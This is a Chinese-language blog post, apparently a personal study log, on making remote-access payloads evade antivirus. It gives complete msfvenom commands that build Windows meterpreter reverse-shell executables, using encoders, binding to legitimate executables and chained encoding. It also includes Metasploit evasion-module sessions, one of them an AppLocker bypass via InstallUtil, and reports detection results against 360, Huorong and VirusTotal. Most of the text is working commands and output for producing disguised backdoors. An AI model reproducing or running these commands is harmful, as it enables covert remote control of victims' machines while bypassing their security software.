遠控免殺的學習(一)

目錄

• 0x00 前言
• 0x01 msf自帶的免殺
  • 1.未處理的payload：
  • 2.msf自編碼處理的payload：
  • 3.msf自捆綁的payload：
  • 4.msf自捆綁+編碼的payload：
  • 5.msf多重編碼的payload：
• msf下的evasion模塊免殺
  • 1.windows/windows_defender_exe模塊
  • 2.windows/windows_defender_js_hta模塊
  • 3.windows/applocker_evasion_install_util模塊

0x00 前言

最近這幾天不知道爲何被遠控免殺給迷住了，緣由都是由於這個https://github.com/TideSec/BypassAntiVirus
雖然上面記錄的，在如今不少都不怎麼免殺了，本身仍是決定學習其中的一些方法。前面的一些免殺工具只是部分使用，感受大部分工具都是跟msfvenom扯不開關係的，而使用的工具中以爲免殺不行的，也不想記錄。主要是360全家桶和火絨做主要查殺工具，VT做爲參考。

0x01 msf自帶的免殺

(msfvenom的參數就不說了)

1.未處理的payload：

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.128 LPORT=4444 -f exe -o ./payload1.exe
VT：58/72；火絨和360秒殺。

2.msf自編碼處理的payload：

編碼器爲x86/shikata_ga_nai：msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.128 LPORT=4444 -e x86/shikata_ga_nai -b "\x00" -i 15 -f exe -o ./payload2.exe
VT:57/72；火絨和360秒殺

3.msf自捆綁的payload：

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.128 LPORT=4444 -x 11.exe -f exe -o ./payload3.exe(其中的11.exe是一個正常的、無後門的exe文件，我本身用python寫的小工具.exe文件)
VT:11/72
火絨和360秒殺

4.msf自捆綁+編碼的payload：

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.128 LPORT=4444 -e x86/shikata_ga_nai -x 11.exe -i 5 f exe -o ./payload4.exe(這種方式有問題，生成的payload很容易沒法運行)

5.msf多重編碼的payload：

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 LHOST=192.168.111.128 LPORT=4444 -f raw | msfvenom -e x86/alpha_upper -i 10 -f raw | msfvenom -e x86/countdown -i 10 -x 360sd.exe -f exe -o payload5.exe
(僅做參考，msfvenom生成失敗，就沒管了)

msf下的evasion模塊免殺

show evasion可查看其下的模塊。

1.windows/windows_defender_exe模塊

msf5 > use windows/windows_defender_exe
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf5 evasion(windows/windows_defender_exe) > show options 
Module options (evasion/windows/windows_defender_exe):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  ukup.exe         yes       Filename for the evasive file (default: random)
Payload options (windows/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.111.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port
Evasion target:
   Id  Name
   --  ----
   0   Microsoft Windows
msf5 evasion(windows/windows_defender_exe) > set filename payload.exe
filename => payload.exe
msf5 evasion(windows/windows_defender_exe) > set payload windows/meterpreter/reverse_tcp 
payload => windows/meterpreter/reverse_tcp
msf5 evasion(windows/windows_defender_exe) > run
[*] Compiled executable size: 4096
[+] payload.exe stored at /root/.msf4/local/payload.exe

靜態360直接給秒殺了，火絨就不用試了。（火絨np）

2.windows/windows_defender_js_hta模塊

msf5 evasion(windows/windows_defender_exe) > use windows/windows_defender_js_hta
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf5 evasion(windows/windows_defender_js_hta) > show options 
Module options (evasion/windows/windows_defender_js_hta):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  WfvPutTKt.hta    yes       Filename for the evasive file (default: random)
Payload options (windows/x64/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.111.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port
Evasion target:
   Id  Name
   --  ----
   0   Microsoft Windows
msf5 evasion(windows/windows_defender_js_hta) > set filename payload.hta
filename => payload.hta
msf5 evasion(windows/windows_defender_js_hta) > run
[+] payload.hta stored at /root/.msf4/local/payload.hta
msf5 evasion(windows/windows_defender_js_hta) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 evasion(windows/windows_defender_js_hta) > set filename payload1.hta
filename => payload1.hta
msf5 evasion(windows/windows_defender_js_hta) > run
[+] payload1.hta stored at /root/.msf4/local/payload1.hta

360全家桶和火絨都沒報毒。(雖然沒報毒，可是在運行的時候會生成一個新的程序來返回shell，但新程序過不了火絨和360，也就是過不了行爲檢測)
payload的VT：23/59；payload1的VT：23/58

3.windows/applocker_evasion_install_util模塊

msf5 evasion(windows/windows_defender_js_hta) > use windows/applocker_evasion_install_util
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf5 evasion(windows/applocker_evasion_install_util) > 
msf5 evasion(windows/applocker_evasion_install_util) > show options 
Module options (evasion/windows/applocker_evasion_install_util):
   Name      Current Setting   Required  Description
   ----      ---------------   --------  -----------
   FILENAME  install_util.txt  yes       Filename for the evasive file (default: install_util.txt)
Payload options (windows/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.111.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port
Evasion target:
   Id  Name
   --  ----
   0   Microsoft Windows
msf5 evasion(windows/applocker_evasion_install_util) > set filename payload.txt
filename => payload.txt
msf5 evasion(windows/applocker_evasion_install_util) > show options 
Module options (evasion/windows/applocker_evasion_install_util):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  payload.txt      yes       Filename for the evasive file (default: install_util.txt)
Payload options (windows/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.111.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port
Evasion target:
   Id  Name
   --  ----
   0   Microsoft Windows
msf5 evasion(windows/applocker_evasion_install_util) > run
[+] payload.txt stored at /root/.msf4/local/payload.txt
[*] Copy payload.txt to the target
[*] Compile using: C:\Windows\Microsoft.Net\Framework\[.NET Version]\csc.exe /out:payload.exe payload.txt
[*] Execute using: C:\Windows\Microsoft.Net\Framework\[.NET Version]\InstallUtil.exe /logfile= /LogToConsole=false /U payload.exe

360和火絨靜態都過，可是行爲查殺熄火。